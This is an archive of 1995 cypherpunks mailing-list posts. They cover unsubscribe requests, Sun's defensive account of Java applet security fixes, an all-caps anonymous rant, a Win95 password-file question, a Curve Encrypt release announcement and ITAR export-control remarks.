          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Tue, 14 Nov 1995 01:57:35 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <ECS9511131718A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Tue, 14 Nov 1995 09:23:38 +0800
To: cypherpunks@toad.com
Subject: Crypto requlations & laws
Message-ID: <9511131751.memo.29723@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Could the person posting the location of the crypto laws please repost.

Thanx ..tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Tue, 14 Nov 1995 02:43:28 +0800
To: cypherpunks@toad.com
Subject: unsuscribe all news groups
Message-ID: <ECS9511131814A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I wish to unsuscribe to all news groups as I feel I should be on a different planet.  
Could somebody notify all newsgroups on on my behalf please.

Sincerely yours








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 14 Nov 1995 19:20:18 +0800
To: cypherpunks@toad.com
Subject: Java security (reposted from RISKS)
Message-ID: <v01530507accdb2e28a83@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------

Date: Fri, 10 Nov 1995 15:45:00 -0800
From: Marianne.Mueller@eng.sun.com (Marianne Mueller)
Subject: regarding Java security

This response was recently posted to comp.lang.java.
Marianne Mueller <mrm@eng.sun.com>, Java Products Group, Sun Microsystems, Inc.

Article 4356 of comp.lang.java:
Path: handler.Eng.Sun.COM!puffin.Eng.Sun.COM!mrm
>From: mrm@puffin.Eng.Sun.COM (Marianne Mueller)
Newsgroups: comp.lang.java
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Date: 9 Nov 1995 00:50:27 GMT
Organization: Sun Microsystems, Inc.  Mt. View, Ca.
Keywords: alpha3 hotjava security

The paper written by the two students at Princeton describes possible
attacks on the alpha3 HotJava browser, which have all been fixed in JDK
beta.  Granted, until this week, the source code for JDK beta wasn't
available, so it's understandable that they analyzed the alpha3 source base.

We understand people need more information on the security model, and we're
taking time right now to document the security story more rigorously.  A
security FAQ, an updated whitepaper, detailed user documentation and
detailed implementor's documentation are all being worked on.

The Java security mechanisms include:

        Java language mechanisms

          * no pointers
          * private interfaces, classes and methods
          * class loader that enforces namespace divisions
          * runtime byte code verifier that enforces language
            type rules and name space divisions

        Browser mechanisms, used by JDK beta appletviewer and by
        Netscape Navigator 2.0beta

          * AppletSecurity: extends java.lang.SecurityManager; strict
            applet checks
          * AppletClassLoader: extends java.lang.ClassLoader; strict
            class loading

The goal for JDK beta is to enable browsers to run untrusted applets
in a trusted environment.  The approach is to be conservative at
first, and to add functionality when it can be added securely.

So, JDK beta applets (and Netscape 2.0beta applets) may not do the
following.

  1.  Files:

        Access Control Lists are greatly restricted in beta,
        as compared to the situation in the alpha3 HotJava browser.
        ACLs are initialized - only once - by the applet security
        manager, and are not user configurable.

        For a file not on the access control list, an applet cannot

        - check for the existence of the file
        - read the file
        - write the file
        - check the file type
        - check if the file is a directory
        - check the timestamp when the file was last modified
        - check the file's size
        - create a directory
        - rename the file
        - list the files in this file (as if it were a directory)

        Applets cannot

        - create a FileInputStream
        - create a RandomAccessFile, either for reading or writing
        - Open file descriptors

  2.  Sockets:

        Applets cannot

        - Create socket connections other than to its own host
        - Create a socket factory

  3.  Loading/linking:

        Applets cannot

        - Create class loaders
        - Access a package in the sun.* hierarchy
        - Define a new class in the java.* hierarchy
        - Link dynamic libraries using System.loadLibrary()
        - Disable or override the AppletSecurityManager

  4.  Process control:

        Applets cannot

        - Define native methods
        - Fork processes
        - Manipulate threads or thread groups outside of the
          applet's thread group
        - Exit the virtual machine (e.g., the browser or the appletviewer)

  5.  awt:

        Applets cannot

        - Create toplevel windows that don't have a warning banner

Applets can use network connections only to connect to the host they
originate from, to download files that are part of the applet's
implementation.  Those files might be java bytecode class files, or they
might be input files used by the applet (GIF, JPEG, audio, other data
files.)

Taking a look at the specific attacks mentioned in the paper -

        alpha3 HotJava                  JDK
        ----------------------          ---

1.      socket accept() and             applets cannot use
        listen() aren't protected       accept() and listen()
        adequately, allowing a
        browser to eavesdrop

2.      applets can connect to          applets cannot connect
        the SMTP (mail) port on         to the SMTP port on
        some web server and use         the computer the applet
        that as a covert channel        is visiting

3.      InetAddress.getByName()         applets cannot use
        is public and does not          InetAddress to inquire
        check the security mode         about hosts they are
        before making DNS request       not already allowed to
                                        connect to

4.      applets can use DNS to          applets may not get the
        create a covert channel         internet address of any
                                        host

5.      Access Control Lists (ACLs)     ACLs are greatly restricted
        for reading and writing         in JDK beta.
        files are not strict enough     Reading/writing files is
                                        disabled for web browsers,
                                        such as Netscape Navigator 2.0.

6.      applets can use the             System.getenv() is obsolete
        System.getenv() method          and is not part of the JDK
        to gather information about     API
        the computer that it is
        running on

7.      applets can change the          applets cannot read or alter
        property manager database       client properties

8.      applets can change the          The fields that hold the
        HTTP and FTP proxy server       HTTP and FTP proxy names are
                                        private.  The values are stored
                                        in a property manager database
                                        that an applet cannot read or
                                        write.

It's very difficult, if not impossible, for a web browser to completely
prevent denial of service attacks.  The JDK applet API doesn't claim to
prevent denial of service attacks.  A "denial of service" attack is where
someone writes an applet whose goal is to consume all available resources on
your computer, forcing you to kill the browser you're running.  For example,
someone could write an applet that creates a million pop-up windows.  The
windows don't do anything, but creating a million of them might use up all
the virtual memory on your computer and you'd have to kill the web browser
to reclaim the virtual memory.

Before people engage in too much wailing and gnashing of teeth about
how applets have been too severely restricted -

We want to enable applets to do interesting things, including making
socket connections, and reading and writing to the file system.  One
way to enable that is to used a signed class loader.  When a trusted
applet is loaded, then the applet could be granted permission to do
some of the things they are prevented from doing by default.

The goal is to ensure that untrusted applets can't steal or damage
information on a computer running a Java-enabled browser.  Later, we can
allow trusted applets to do things that untrusted applets are not allowed to
do.  Since an implementation bug in a trusted applet could open a loophole
that could be exploited by an untrusted applet, design matters.

Marianne  Java Products Group  http://java.sun.com/people/mrm/

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 12:34:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511140403.UAA10207@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


ON SAT, 11 NOV 1995, ANOTHER TENTACLE WROTE:

> >  JEFF, I THINK IT'S IN YOUR BEST INTEREST TO NOT WASTE YOUR TIME
> >RESPONDING TO THIS MORON (WHO BEARS MANY FEATURES IN COMMON WITH
> >DETWEILER)
> 
> EXCEPT FOR HIS ESTEEMED "CREDENTIALS", OF COURSE...

CREDENTIALS??!!??  WHAT CREDENTIALS??  'YOU WANNA HEAR, SOME STINKING
CREEEDENTIALS, BEFORE YOU SMELL THAT SOMETHING IS ROTTEN IN DENMARK,
EH?  

RIGHT UNDER YOUR NOSE ... AND IT AIN'T NO LIMBURGER.

YOU DON'T NEED NO CREDENTIALS TO DO THAT.  THE STENCH IS PRETTY
OVERWHELMING.  IT'S MORE THAN A LITTLE RIPE ...

DO YOU WANT TO HEAR HOW I USED TO BOOK LARGE BLOCKS OF TIME ON THE
TRS-80 IN THE HIGH SCHOOL PHYSICS LAB, WHILE DEBATING QUANTUM PHYSICS
WITH MY OLD FRIEND, TREV, THE GUY WHO BECAME A RHODES SCHOLAR??

WOULD THESE CREDENTIALS HELP YOU SMELL A RAT??

MAYBE YOU WANT TO HEAR ABOUT HOW I OUTGREW RACK SHACK WHILE IN HIGH
SCHOOL AND MOVED FORWARD TO PLAYING ADVENTURE ON THE CHEMICAL
ENGINEERING VAX, READING NEWS ON THE DECWRITER, ASKING ALIZA FOR
ADVICE, AND DISCOVERING MULTICS, ALL WHILE IGNORING MY HIGH SCHOOL
STUDIES.

ARE ANY OF THESE CREDENTIALS GONNA MAKE YOU BELIEVE??

IT'S ALL JUST ANCIENT HISTORY.  PAST PERFORMANCE.  YOU CAN'T RELY
ON IT, OR DEMAND CREDENTIALS IF YOU WANT ORIGINALITY AND CREATIVITY.

PAST PERFORMANCE MEANS NOTHING.  IT'S NOT AN INDICATOR OF FUTURE
PERFORMANCE.  (BUT, DECWRITER'S WERE A CRACKER'S DREAM WITH THEIR
PASSWORD OVERSTRIKE ...  HE ... HE ... HE ...  ESPECIALLY WHEN PEOPLE
CONNECTED A DECWRITER TO MULTICS.  WON'T TALK ABOUT BRINGING DEVELNET
DOWN, WITH A SINGLE CTRL-G, EITHER.)

IS THIS WHATCHYA WANT??  OR DO YOU WANT TO HEAR ABOUT HOW I WAS
"RECRUITED"??  OF WHAT BROUGHT ME HERE, RECENTLY.  THAT'S A LONG
STORY.  ONE WHERE I HAVE TO EXPLAIN WHY THE LOCAL HOMETOWN CHIEF OF
POLICE RESIGNED WITHOUT A REPLACEMENT.  AND OF THE VOTE OF NON
CONFIDENCE IN THE DEPARTMENT BY THE COMMISSION, AND OF CRIME-STOPPERS
AND THEIR SUPPOSED ANONYMITY AND OF A MURDER INVESTIGATION GONE
SIDEWAYS AND WHY WE NOW HAVE A BRAND SPANKING NEW CHIEF OF POLICE.

A REAL CUTEY, TOO!!  MIGHT EVEN EXPLAIN WHY THE PARTY LINE.

MAYBE YOU WANT TO HEAR ABOUT SOME OF THE NAUGHTY, NAUGHTY RESEARCH
THAT WAS HAPPENING WAAAAY, WAAAY BACK WHEN ...  LIKE MAYBE, A COUPLE
OF RECOMBINANT DNA EXPERIMENTS I WAS ASSISTING WITH WHEN I WAS FIFTEEN
... MAYBE EVEN THE EXPERIMENTS THAT LEAD TO AN UNSCHEDULED RELEASE OF
BIO-ACTIVE MATERIAL??

OOPS ... E. COLI, EH?

NAAAH, WE'LL ALL SHADDUP 'BOUT ALL THAT.  BUT I WONDER WHAT THAT
MULTICS WAS DOING IN SOME FOREIGN COUNTRY.  YOU'D HAVE THOUGHT THAT
ITAR OR SOMESUCH WOULD HAVE PREVENTED THE EXPORT TO A BUNCHA
FOREIGNERS, NO??

NO.

WE'RE CANADIEN, EH??  WE'RE JUST LIKE YANKEES, CEPT WE WEAR TOQUES AND
PLAY HOCKEY ... AND WE'LL JUST ROLL OVER AND CEDE OUR OURSELVES TO
THAT SOUTHERN ELEPHANT THAT WE LIVE RIGHT NEXT DOOR TO.

PHOOEY.

MAYBE YOU WANT TO HEAR ABOUT WHAT HAPPENED AFTER I MOVED FROM THE
DANGEROUS BIOLOGICAL AND PHYSICAL SCIENCES TO SOMETHING BENIGN, LIKE
COMPUTERS AND NETWORKS.  WHAT HAPPENED AFTER THE NON-SCHEDULED RELEASE
OF BIO-ACTIVE MATERIAL, OF HOW I INITIALLY GOT INTRO'D.

MAYBE THAT'LL HELP YOU SMELL THE SMOKE??

OK ... IF IT'LL HELP, 1'LL TELL YOU STUFF 'BOUT ME, SO YOU CAN JUDGE
MY "SO CALLED" CREDENTIALS ...

FROM AGE FIFTEEN, AFTER THE UNSCHEDULED RELEASE, I WAS "MENTORRED" BY
ONE OF THE TOP SECURITY EXPERTS, ONE OF THE BEST OF THE FIELD, A MAN
WHO I STILL HAVE THE UTMOST RESPECT FOR AND SOMEONE WHO I AM
UNFORTUNATELY NOT ANY LONGER IN CONTACT WITH.  SOMEONE WHO IN SOME
WEIRD AND WARPED WAY IS ACTUALLY RESPONSIBLE FOR MAKING IT ALL HAPPEN.
(BUT THEN AGAIN, HE WENT TO THE BRONX SCHOOL OF SCIENCE ... I THINK)
AND THAT EXPLAINS NOTHING AND EVERYTHING AT THE SAME TIME.

(HE'S PRETTY BALD NOW, TOO ... GUESS I DIDN'T JUST MAKE HIS HAIR GREY,
HE PROBABLY ENDED UP TEARING MOST OF IT OUT BY THE HANDFUL.)

OOPS, I SHOULDN'T HAVE SAID THAT ...

ANY MORE CLUES??

HMMM, HOW ABOUT WHAT HAPPENED AFTER DROPPING OUT OF HIGH SCHOOL WHEN I
WAS SEVENTEEN AND LEAVING THE VAX AND MULTICS AND PUNCHED CARDS BEHIND
AND GOING TO WORK ON THE FIRST NCR IMPLEMENTATION OF DEBIT CARDS AND
THE CREATION OF THE FIRST ATM NETWORK.

WOULD THAT HELP??  IMPLEMENTATION OF AN OFFLINE NON-NETWORKED ATM 
NETWORK?  I MEAN, IT'S NOT LIKE A CASH REGISTER COMPANY MIGHT HAVE 
WORKED ON E-CASH BACK IN THE LATE SEVENTIES AND EARLY EIGHTIES, 
OR SOMETHING.

OOPS, MORE CLUES ... GOTTA STOP POSTING THOSE CLUES ... 

(IF I KEEPA POSTING CLUES, THEY MIGHT FIGURE OUT THAT ALL PUBLIC
INFORMATION IS INHERENTLY DISINFORMATION, OR SOMETHING LIKE THAT.)

OK ... HOW 'BOUT THIS ... HOW ABOUT WHEN I TRIED TO RUN FOR THE DOORS
WHEN THE PROJECT ABANDONNED NCR FOR THE ATM NETWORK AND EXPECTED MOI 
TO LEARN CICS AND JCL. 

HEE-BEE JEE-BEES ... JCL ... <SHUDDER>

IT'S ENOUGH FOR ANYONE TO RUN FOR THE DOORS.  LEFT MY OWN PERSONAL
LITTLE MINI AT MY DESK, MY OWN LITTLE FIEFDOM, IN THE CAPABLE HANDS OF
A COUPLE OF TECHIES AND LEFT THE BIG BLUE CONVERSION IN THE
SEMI-CAPABLE HANDS OF SOME ASSOCIATES FROM DMR (I THINK), AND GOT THE
HECK OUTTA THE FIELD.

SORTA ... KINDA ...

IS THIS GONNA MAKE YOU BELIEVE THAT THE VODKA IS FLOWING, BUT THE MEAT
IS ROTTEN??  PROBABLY NOT.

IS IT GONNA MAKE YOU STOP HOLDING YOUR NOSE??  COLOUR ME, DOUBTFUL. 

LET'S JUST SAY THAT I TIRED OF THE NONSENSE AND TOOK A BREATHER.

MAYBE IT WAS THAT FATEFUL DAY WHEN MANAGEMENT QUESTIONED WHY I HADN'T
SHAVED FOR THE MORNING MANAGEMENT BRIEFING -- THE MORNING MEETING WITH
THE DOUGHNUTS, BRIGHT AND EARLY AT EIGHT.  

I HAD THE TEMERITY TO APPEAR HALF-SHAVEN AND HALF-BAKED AFTER
HANDHOLDING THE NETWORK THROUGHOUT THE NIGHT, THE DAY, AND ANOTHER
NIGHT.  I WAS SPACED AND MESSY.

BUT IT WAS A DEFINING MOMENT.  

WHILE THOSE CAFETERIA BENCHES MADE GREAT BEDS IN A PINCH, AND WHILE
YOU COULD ALWAYS SPONGE BATH IN THE EXECUTIVE BATHROOM.  IT GOT TO BE
OVERWHELMING AFTER A COUPLE OF DAYS AT THE OFFICE.

AND IT WAS MY MISTAKE.  MY OVERSIGHT.  MAKE NO DOUBT ABOUT THAT.

I SUPPOSE MANAGEMENT WAS RIGHT, NO OFFICE EMPLOYEE SHOULD EVER STUMBLE
UPON CRO-MAGNON MAN STANDING NUDE IN THE JOHN.  NO ONE REASONABLY
EXPECTS TO BE CONFRONTED BY DONKEY KONG.  ESPECIALLY DURING
STANDARD:DAYLIGHT TIME CONVERSION WHEN MR ROCKET SCIENTIST FORGETS TO
CHANGE A WRISTWATCH AND BARES ALL, THINKING THAT EIGHT IS SEVEN, AND
IS SURPRISED!!

OOPS ... 

IS IT REALLY GONNA HELP MY CREDENTIALS ANY, IF I TALK ABOUT BEING
CAUGHT WITH MY PANTS DOWN??  OR EXPLAINING WHY I HADN'T SHAVED FOR THE
MORNING BRIEFING??  OR DE-BRIEFING, AS THE CASE MAY BE.

LET'S JUST SAY THAT I LEFT THE FIELD ...

OR ... MAYBE ... MAYBE ... SOME QUICK DAMAGE CONTROL ... MAYBE, WE HAD
DIFFERING VISIONS OF SYSTEMS -- MANAGEMENT AND I -- YEAH THAT'S THE
TICKET -- MAYBE I "ACCIDENTLY" LEANED AGAINST THE WALL AFTER
MANAGEMENT IMPLEMENTED THEIR OWN DRESS POLICY ... I MEAN HOW DANGEROUS
COULD AN IMPLEMENTED DRESS POLICY BE??

"IT'S ONLY A DRESS POLICY," THEY SAID.

I SUPPOSE THE SUGGESTION THAT TROUSERS *MUST* BE WORN AT ALL TIMES WAS
REASONABLE ... AND IN HINDSIGHT ... I SUPPOSE I SHOULDN'T HAVE
"ACCIDENTALLY" DUMPED THE HALON WHEN THEY SUGGESTED THAT BOW-TIES WERE
NOT APPROPRIATE CORPORATE ATTIRE AT A FINANCIAL INSTITUTION -- THAT
THEY *SHOULDN'T* BE WORN.  THAT WAS ALL OK.  I THINK WHAT FINALLY MADE
ME SNAP WAS WHEN THEY SUGGESTED THAT I ... AND EVERYONE ELSE ...
SHOULD NOT ONLY *ALWAYS* WEAR TROUSERS AND *NEVER* BOW-TIES, BUT THAT
WE *MUST* WEAR A "NORMAL" TIE AT ALL TIMES AND BE A GOOD LIL BIO-UNIT.

MAYBE IT WAS THE DIRECT ORDERS TO WEAR ONE OF THOSE FLOPPY DANGLY
THINGS AROUND MY NECK WHEN I WAS AROUND THE LINE PRINTERS ... BEING
ORDERED TO WEAR IT THAT DID IT.  OR MAYBE, IT WAS SOMETHING ELSE
ALTOGETHER DIFFERENT.

WHO KNOWS??  

BUT THE BOTTOM LINE WAS THAT I WAS OFF TO JOIN THE WONDERFUL WORLD OF
FINANCE AND MANAGEMENT.  THE NOOSE HAD WON, I *WOULD* WEAR IT, AND I
COULD KEEP MY PANTS -- AT ALL TIMES -- WHERE THEY TRULY BELONGED.

ARE THESE THE CREDENTIALS, THAT YOU'RE AFTER??

THE ONES THAT WILL MAKE THE WORLD STOP SPINNING, AND SLOW DOWN AND
LISTEN ... WHEN SOMEONE SCREAMS FIRE IN A CROWDED THEATRE?  AND ASKS
THAT THE NETWORK BE TAKEN DOWN FOR SECURITY REASONS?  OR, 
ALTERNATELY THAT A PARTICULAR INSTALLED CODE BASE BE REMOVED, BECAUSE 
IT IS EVIL INCARNATE??

PROBABLY NOT ... IT DOESN'T ADD ANYTHING TO MY PROFILE AT ALL. 

MAYBE, WHAT MIGHT HELP IS SOMETHING MORE SIMPLE.  AFTER LEAVING THE
BIO-SCIENCES FOR SOMETHING SAFER, AND THEN THE COMPUTER SCIENCES, AND
THEN ULTIMATELY LEAVING FINANCE AND MANAGEMENT.  WHAT WAS LEFT FOR A
BIOUNIT TO DO.

BUT THAT WOULD LEAD TO THE STORY OF HOW -- THANKS TO SOME POLISH
MATHEMATICIAN -- I DRIFTED OVER INTO PURE MATHEMATICS AFTER BECOMING A
SEMI-RETIRED SLUMLORD IN MY EARLY TWENTIES, AND AN OCCASIONAL
CONSULTANT AND FINANCIAL ANALYST WHO HELPED PEOPLE SWAP AND DERIVE
THINGS.  A SYSTEMS-DECONSTRUCTIONIST.

RACCONTEUR, BON-VIVANT, AND A RENAISSANCE MAN ARE SOME OF LABELS
HURLED MY WAY IN SCURRILLOUS ATTACKS.  FIGHTING WORDS.

AND NOW??  WELL LET'S JUST SAY THAT PURE MATH IS A GREAT HOBBY FOR 
ONE OF THOSE GOSH-DARNED INDEPENDANTS.  

SURE BEATS STAMP COLLECTING OR COMIC BOOKS.  

EXCEPT FOR THAT SCOTT ADAMS GUY ... HE'S A RUSH ... THIS MORNING'S 
DILBERT WAS A REAL H00T ... TEN-DOLLAR BONUS FOR BUG-FREE SOFTWARE 
... *POSH* ... I MEAN WHERE DOES THIS SCOTT GUY GET HIS MATERIAL??  

YAHOO!!  AND YIPPEE KI YAY!!  I FINALLY FIGURED IT OUT.

ALICE IS ACTUALLY SCOTT ADAMS.  SOMEONE FINALLY "BROKE THE CODE".
THE CODE:  A CHICKEN IN EVERY POT AND A MINI-VAN IN EVERY DRIVEWAY!!!
(GUESS YOU HAD TO BE THERE ... OR YOU HAD TO READ THIS MORNINGS FUNNY.)


                ---  LOVE YA ... MEAN IT ... ---


MALICE DE 'MONSTEROUS

                                  ...JUST ANOTHER ONE OF THOSE...
                                                ...TENTACLES...

P.S.  THIS POST IS IN THE PUBLIC DOMAIN.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Tue, 14 Nov 1995 20:58:51 +0800
To: lestat@richmond.infi.net (Terry Harrison)
Subject: Re: Password File Utility Wanted [Win95, ha ha]
In-Reply-To: <48888p$970@news.infi.net>
Message-ID: <199511140428.UAA03630@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
comp.os.ms-windows.win95.misc, alt.security,comp.security.misc)

-----BEGIN PGP SIGNED MESSAGE-----

In article <48888p$970@news.infi.net>, lestat@richmond.infi.net
(Terry Harrison) wrote:

>I would like to obtain a program to address the following.....
>
>I use the 'remember password' option on my network logins, and then
>when they expire, I don't remember what they were.  This is bad as I
>need them to change the old password (particularly a problem with
>Netware).  What I would like is a utility that would prompt me for my
>current windows ID for security, then decode the .pwl files so that I
>could read my old passwords.  Ideally, it would allow an edit of the
>existing passwords as well.  Anybody seen onea these??

Such a thing could exist, because Win95 allows you to save passwords that
use different encryption methods. Microsoft would say "no, doesn't exist,"
however, because this is a major security flaw. I haven't seen such a
tool, though. Anybody?

What you should do is get a real encryption package like PGP (poke
around on http://web.mit.edu/ or http://www.netresponse.com/zldf/, it's
free), use something that is long and complicated but that you will never
ever forget as your PGP passphrase, and encrypt a text file containing
all of your passwords with PGP. You can put other stuff like all your
credit card numbers in a PGP-encrypted file with reasonable safety too.
You (only) will be able to decrypt and read this file whenever you want.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKgam43DXUbM57SdAQE9eQP/YY/Sv9izIoSg9gnOZUM+WQSZfkv/YDi4
oCzFerVMDFZT+7kD+w206qGjrtWUDQ3Rwie5XqlaLG3Ezhh9tpldMMPdy50K8dwI
WL43SQeplXDxAESUC3Td7j2MRK5ONacfojSaSoauHW6Ffr+M2sU5opJlB+y88eTv
45VCTDn8J1I=
=Qbqx
-----END PGP SIGNATURE-----
-- 
rich graves, llurch@networking.stanford.edu
moderator of the win95netbugs list
http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Tue, 14 Nov 1995 12:05:38 +0800
To: mcip@DeepEddy.com
Subject: ANNOUNCE: Curve Encrypt 2.2
Message-ID: <199511140336.UAA17922@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Curve Encrypt version 2.2 is now available.

Curve Encrypt is a program for encrypting files on a Macintosh so that they 
cannot be read without a pass phrase. It works on files, folders or whole 
volumes, and supports the IDEA and triple-DES encryption algorithms. CE also 
supports Aladdin's StuffIt Engine for data compression. Full source code is 
provided. System 7 only.


NEW FOR 2.2

The following changes have been made for the 2.2 release:

* When wiping free space on a volume, Curve Encrypt 2.2 now also wipes unused 
space in allocated blocks.

* Curve Encrypt 2.2 comes with both PowerPC native and 68K versions.


FTP SITES

Curve Encrypt is available with source at the following FTP sites:

ftp://ripem.msu.edu/pub/crypt/mac/
This is an export controlled ftp site: read /pub/crypt/GETTING_ACCESS for
information on access.

ftp://ftp.csn.org:/mpj/I_will_not_export/crypto_???????/
ftp.csn.org is also export-controlled: read /mpj/README for the characters 
to replace ???????.

ftp://miyako.dorm.duke.edu/pub/noexport_?????/miyako/mac/strong/
Read the file /pub/GETTING_ACCESS for the characters to replace ?????.


ADDRESS FOR SUPPORT

Curve Encrypt (c)1994-1995, Curve Software. 

Please send email to kinney@colorado.edu. Bug reports, suggestions, praise, 
flames, whatever are all welcome. Curve Encrypt is provided free of charge. 
If you like the program, give it to a friend or two. If you like the source 
code, lift it and make something new with it. 

License is granted under the copyright for distribution within the United 
States only. Export of this software may violate United States export law. 
Support will not be provided for non-U.S. addresses or anon id's. Sorry about 
that.


The Curve Software PGP public key is:

- ------BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAiz+bEEAAAEEAMUbtdwYC1vY+s5559ERIvC1MT+Yaw3ozheaHcUciJe7cSAk
k9TpAQd7iKukKnQe5kK1YtvYm0JP6fmNrcO8AmG5ukvcOlyuri618sjpXncpQ1cL
5xeV80f3JtmheGMnqAzTK8OyfJ7zRh1PhAZcT/vVzf+JGuCuVcJkEfxTVMrJABEB
AAG0JEN1cnZlIFNvZnR3YXJlIDxraW5uZXlAY29sb3JhZG8uZWR1PokAlQMFEC8/
JWrCZBH8U1TKyQEB4QkD/A+RZOa0LxDWbELuQKCnn2wvn8fWXLGP21kk0Le0Nmto
CbbodAkNaYW7UIXI+qbRX4uqqM3iKY2xMKU4XwdiObLCEfTU+/tLJB2Ai5iS0Ksn
F6RLZuZa5pGGH4Qi1BfGGWeOKG9+cJz2yJewmBNMER40GtS/xiA8sIBG0qGUIKMT
tCtDdXJ2ZSBTb2Z0d2FyZSA8a2lubmV5QGJvZ2FydC5jb2xvcmFkby5lZHU+iQCV
AwUQLxSZGU8YjrUhOUC5AQGs/wP/aEm05/CyjgBekSZQI8zrQClw5JUXJgvdSRKH
SsDOYocuCFrqCBps4vp38LIf/xMJNUG5qkJyjBJhXfNdfG3XNLjLlWSTcleu/JNq
yEExexF6b6HuLRlnyQLCaJ/UVAlu8aSJO64WvRMGoB2I5ABplabbD5h2iTb2ax7j
DtomJRyJAJUCBRAuPbLo+ht7PfBFtMEBAZUsA/9gq0zp6ijWHQpnSnAFT6kfyWLN
Tup4l0JtyFTe+7X+DFvCY6S28NMPcoh/z1osxJdpYISJHdEuTM++crAeSOtlQtHv
d91MPrN7aB/2GK+2FmVLjMkJ0HyNPzQhW9BhHpjnhwwhkrOXMwbuPeaycz1iOw5s
Ja5Bp85+I+J78cxbVYkAlQIFEC4NndHCZBH8U1TKyQEB3jAD/3S1zoWnRPeRKubP
RWxuf4zt40Pd82n9dXIJbjEzrHNAreihECNYFudluLFPKHOUrfdfb4RAYZgHmNYD
kD6GAY6TfFiECmAGf4quK8XTEonE2FHgKey6aYjJcuftQ9eXQes+8qzO9IJUOG2T
LZLLqM0pByY3u+QV9j5oB7yjHz3jiQCVAgUQLgIBo0uyWgLZPETFAQGraAP/Yp5d
t+s4LeLoWxM02s4NEjXuLbddMyKq4FaZE2F5UhBXV1s0oHsNZrBQ1rKRJmIYISih
b4dEpK/eIQa9CIG7W/XUkH/sh3XRr5sinMLPN8ZD5G9sIJO336AAK/cmm5e0GZy8
igcoBSlu5CFR3+9HXvHpT202HIRrh9158eCZSyOJAJUCBRAtBLJRIDvxOj7zTo0B
AQLFA/9fmt+S3PyHcl4OpfRz0iGhtYvfq9gZW/OqvxWJiQBExgjtDhwq6keAO6c7
5D7MqJJKxIUGXOU97h92DmEn54M5SKtwVGDPkG78I3WMDA90SUAdzhbXbKKKtO+r
geCBHuPftoI/PXGxSaDNspuIzoUjpIpNYrR9o6hegIJsbMDi/Q==
=x0ri
- ------END PGP PUBLIC KEY BLOCK-----

All official releases will be validated by a signature from this key.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNhKMJkEfxTVMrJAQF1HgQAophyo7VlpIS9pzkpj2kPk5HkBoWffttc
4YJqcJMGUc8ZSIe1vJqXjnljdyk7/MV9O/nXK/mLh3sqdf5pV2tSJzbQHImoq6mL
HyHhP6bL4hZPZJaEIXWQRK6meiUJDy0wzKOqRFAZcJk4ojulfa31lTujg6Ckh3/J
C+GNG0lp1fg=
=YNK6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 14 Nov 1995 03:24:53 +0800
To: Mary Rose <m.landicho@biology.bbk.ac.uk>
Subject: Re: unsuscribe all news groups
Message-ID: <199511131855.UAA00152@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> I wish to unsuscribe to all news groups as I feel I should be on a different 
planet.  
> Could somebody notify all newsgroups on on my behalf please.
> 
> Sincerely yours

Please send a one line message containing only

HELP

to majordomo@toad.com to get help on doing this.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 14 Nov 1995 20:56:22 +0800
To: cypherpunks@toad.com
Subject: Getting the ITAR
Message-ID: <9511140421.AA12502@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The front of the ITAR has this convenient phone number you can call
to get a copy: 1 703 875 6644.  I don't think anyone on this list can
claim ignorance. :)  BTW, as for Pegasus, please note that I didn't say
the author was going to get in trouble, merely that his software is
export controlled -- there's a difference.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 14 Nov 1995 13:38:27 +0800
To: cypherpunks@toad.com
Subject: Offshore Assets Reconciliation using PGP
Message-ID: <Pine.SOL.3.91.951113234809.15842A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


